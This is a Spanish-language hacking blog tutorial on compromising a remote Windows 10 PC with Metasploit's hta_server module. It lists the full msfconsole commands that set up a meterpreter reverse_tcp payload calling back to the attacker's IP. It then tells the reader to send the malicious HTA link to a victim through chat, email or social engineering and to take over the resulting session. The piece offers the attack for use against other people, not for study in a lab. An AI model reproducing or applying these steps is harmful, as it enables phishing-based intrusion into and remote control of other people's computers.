Descarga tu guía de trucos informáticos aquí
Hacking Windows Metasploit HTA Server
Hacking Windows Metasploit HTA Server

Hackear PC remota Windows 10 usando HTA Web Server

Este módulo aloja una HTML Application (HTA) que, cuando se abre, ejecutará una payload  (carga útil) a través de Powershell. Cuando un usuario navega hacia el archivo HTA, Windows te alertará dos veces antes de que se ejecute la carga útil

[eckosc_status_message title=”Nota!” icon=”fa-exclamation-triangle” type=”warn” message=”Este método, de hace algunos años, desgraciadamente funciona con Windows Defender desactivado. Un usuario (Jesus P. M), a través de la fanpage de FB, me pidió el tutorial y aquí está. Un saludo Jesus!.”]

Objetivos de explotación


Hacking con HTA Web Server

  • Abre el terminal e inicia el Metasploit Framework (MSF):
msfconsole
Iniciar msfconsole en Parrot OS
Iniciar msfconsole en Parrot OS
  • Creamos la payload con los siguientes comandos:
use exploit/windows/misc/hta_server
set lhost <tu_IP>
set srvhost <tu_IP>
set payload windows/meterpreter/reverse_tcp
set lport 8443
exploit
Crear exploit hta_server
Crear exploit hta_server

Para conocer tu IP abre una nueva terminal y ejecuta el comando ifconfig.

  • Lo hecho anteriormente creará un URL con el archivo infeccioso. Envía el enlace del servidor a la víctima por chat o correo electrónico o cualquier técnica de ingeniería social.
Enviar hta_server por ingeniería social
Enviar hta_server por ingeniería social
  • Cuando el ordenador víctima navegue hacía tu enlace, descargará un archivo del tipo abcxyz.hta, y cuando la víctima haga clic en él obtendrás la sesión de meterpreter.
Ejecución de archivo hta en Windows 10
Ejecución de archivo hta en Windows 10
  • Ahora tienes acceso a la PC de las víctimas. Utiliza el comando “sessions -i” y el número de sesión para conectarte a la sesión.


Sesión de meterpreter con hta_server
Sesión de meterpreter con hta_server

Recomendaciones similares:

Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)

¿Te ha gustado este artículo? Sigue este blog en su fanpage de  FacebookTwitterInstagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!

Más artículos
Comandos crear cuenta de usuarios Linux
+3 Comandos para crear una cuenta de usuario en Linux